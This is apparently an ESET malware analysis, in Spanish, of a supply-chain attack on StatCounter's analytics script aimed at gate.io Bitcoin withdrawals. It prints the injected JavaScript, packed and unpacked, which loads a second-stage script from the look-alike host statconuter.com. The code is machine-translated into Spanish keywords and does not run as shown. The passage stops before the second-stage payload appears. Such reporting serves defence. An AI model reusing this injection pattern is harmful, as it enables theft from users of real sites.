Ataque de cadena de suministro al intercambio de cryptomonedas gate.io
Una investigación reciente de ESET muestra hasta dónde pueden llegar los atacantes para robar bitcoins de los clientes de un cambio de moneda virtual específico.
[Actualizado el día 7 de noviembre] El pasado 6 de noviembre, StatCounter eliminó el script malicioso. Varias horas después, Gate.io dejó de utilizar el servicio de análisis StatCounter para prevenir futuras infecciones. Entonces, el incidente ahora está resuelto y ambos sitios se pueden navegar de manera segura.
El pasado 3 de noviembre, atacantes vulneraron la seguridad de StatCounter, una conocida plataforma de análisis web. Este servicio es utilizado por muchos webmasters para extraer datos estadísticos sobre las visitas que recibe un sitio; similar a lo que ofrece Google Analytics. Para hacer uso de la herramienta, los webmasters suelen añadir una etiqueta JavaScript externa mediando el cual incorporando un segmento de código de StatCounter - www.statcounter[.]com/counter/counter.js - en cada página web.
Según el sitio oficial, StatCounter es utilizado por más de dos millones de sitios y calcula estadísticas de más de 10 millones de páginas vistas por mes. Esta información está alineada con su posición en el ranking de Alexa, que está por encima de los 5.000. Como referencia, el sitio oficial de la distribución Debian Linux, debian.org, tiene una posición similar en el ranking de Alexa.
Los atacantes modificaron el script www.statcounter[.]com/counter/counter.js al agregarle una porción de código malicioso, que tal como se puede apreciar más abajo, está ubicado en el medio del script. Esto es inusual, porque los atacantes generalmente agregan código malicioso al principio o al final de un archivo legítimo. La inyección de código en medio de un script existente generalmente es difícil de detectar mediante una observación casual.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 dieciséis 17 18 |
evaluar(función(pag, a, C, k, mi, r) { mi = función(C) { devolver C.Encadenar(a) }; si (!''.reemplazar(/^/, Cadena)) { mientras (C--) r[e(c)] = k[c] || mi(C); k = [function(e) { return r[e] }]; mi = función() { devolver '\w+' }; C = 1 }; mientras (C--) si (k[c]) pag = pag.reemplazar(nuevo RegExp('\b' + mi(C) + '\b', 'gramo'), k[c]); devolver pag }('3=""+2.4;5(3.6('7/8/9')>-1){a 0=2.b('d');0.e='f:/ /ghi/cj';0.k('l','m');2.nop(0)}', 26, 26, 'ga||document|myselfloc|ubicación|if|indexOf|myaccount|withdraw|BTC|var|createElement||script|src|https|www|statconuter|com|php|setAttribute|async|true|documentElement|firstChild|appendChild '.dividir('|'), 0, {})); |
El script se empaqueta con el empaquetador Dean Edwards Java Script; probablemente el más popular para JavaScript. Sin embargo, puede ser desempaquetado de manera sencilla, dando como resultado el código script que ejecutará, como se puede apreciar más abajo.
|
yo mismo = '' + documento.ubicación; si (yo mismo.índice de('mi cuenta/retirar/BTC') > -1) { variable Georgia = documento.crearElemento(guion); Georgia.origen = 'https://www.statconuter.com/c.php'; Georgia.establecer atributo('asincrónico', 'verdadero'); documento.documentElement.primer hijo.añadir Niño(Georgia); } |
Esta porción de código primero revisará si la URL contiene mi cuenta/retirar/BTC. De esta forma, podemos adivinar que el objetivo de los atacantes es dirigir una plataforma de Bitcoin. Si pasa la revisión, el script continúa y agrega un nuevo script en la página web e incorpora el código en https://www.statconuter[.]com/c.php.
Nótese que los atacantes registraron un dominio muy similar al sitio legítimo de StatCounter[.]com. Tan solo cambiaron el orden de dos cartas, las cuales son difíciles de notar al momento de revisar los registros por cualquier actividad inusual. Resulta interesante que, al revisar el DNS pasivo del dominio, notamos que este dominio ya fue suspendido en 2010 por uso abusivo.
Como se explicó anteriormente, el script se dirige a un identificador uniforme de recursos (URI, por sus siglas en inglés) específico: mi cuenta/retirar/BTC. Resulta que entre los distintos intercambios de criptomonedas disponibles al momento de escribir este texto, solo gate.io tiene una página válida con esta URI. Por lo tanto, este intercambio parece ser el principal objetivo de este ataque. Cabe señalar que este intercambio es muy popular, y que está clasificado en Alexa en la posición 26,251 y en la 8,308 en China.
Además, según coinmarketcap.com, por esta plataforma pasan todos los días varios millones de dólares, incluidos 1,6 millones de dólares solo en transacciones de Bitcoin. Con lo cual, podría resultar muy redituable para los atacantes robar criptomonedas a gran escala en esta plataforma.
El sitio web https://www.gate[.]io/myaccount/withdraw/BTC, presentado más abajo, se utiliza para transferir bitcoin desde la cuenta de gate.io hacia una dirección de Bitcoin externo.
Quizás no sea sorprendente, pero resulta que el payload de segunda fase, desde statconuter[.]com/c.php, está diseñado para robar Bitcoins. Con lo cual, tiene sentido la inyección del script en la página web del sitio para transferir bitcoins: gate.io. Este guión también está empaquetado con Dean Edwards. A continuación, mostramos la versión desempaquetada.